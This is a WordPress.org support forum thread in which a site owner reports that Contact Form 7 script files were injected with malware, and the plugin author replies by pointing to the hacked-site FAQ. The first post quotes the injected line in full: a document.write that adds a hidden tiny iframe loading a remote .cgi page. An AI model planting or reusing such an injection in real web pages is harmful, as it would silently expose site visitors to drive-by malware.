WordPress.org

Ready to get started?Download WordPress

Forums

Contact Form 7
Contact Form 7 malware attached to scripts (4 posts)

  1. vaschops
    Member
    Posted 1 year ago #

    Hi..

    I am having repeated issues on multiple websites that i use CF7 with malware attached to some scripts...identified as code injection by webmaster tools...
    The websites are being 'blocked' by google...and the browser...landing on a message page instead the url homepage...saying "The Website Ahead Contains Malware!".

    The url of the malware is like this:
    http://.../wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.3.1

    The code inserted is:

    document.write('<iframe src="http://jnvzpp.sellClassics.com/
    geographicallyconquering.cgi?8" scrolling="auto" frameborder
    ="no" align="center" height="5" width="5"></iframe>');

    I tried removing the iframe that appears inserted at the bottom of all of the scripts in the JS folder of CF7...manually...but i dont yet know if they will be regenerated by another kind of script.

    From forums i read there a security breach to a lot of sites through CF7.
    Some quoted that by removing the plugin removed the problem as well.
    I will have to do the same if there is no action addressed to this security problem.

    Could someone from the developers comment on this?

    Or...if anyone else who has resolved this issue...could shed some light to this troubling case.

    Thank u for a great plugin...We ought to keep it that way.

    .v.

    http://wordpress.org/extend/plugins/contact-form-7/

  2. Takayuki Miyoshi
    Member
    Plugin Author

    Posted 1 year ago #

    Where is the site? When did you realize the issue first?

  3. vaschops
    Member
    Posted 1 year ago #

    Hi again...

    I have to say that the problem goes further than CF7.
    Yesterday i cleaned the injected code from JS files of CF7...
    ...and today i had new injected codes in Shortcodes Ultimate JS files.
    I also installed a plugin, Simple Login Log...to help me find out if there is any hidden user trying to login...and there was one failed attempt as 'admin'...(there is no register user like that)

    So...i dont know how these breaches occur.

    The site is http://www.eloundaisland.gr

    Now...if the same security issues occur for all plugins that use JS files...i m not sure...

    Please comment if u know...or can see something i dont...

    Thanks for your quick reply.

  4. Takayuki Miyoshi
    Member
    Plugin Author

    Posted 1 year ago #

    Take steps written in FAQ My site was hacked. Then if you find the cause, please report it here.

Topic Closed

This topic has been closed to new replies.

About this Plugin

About this Topic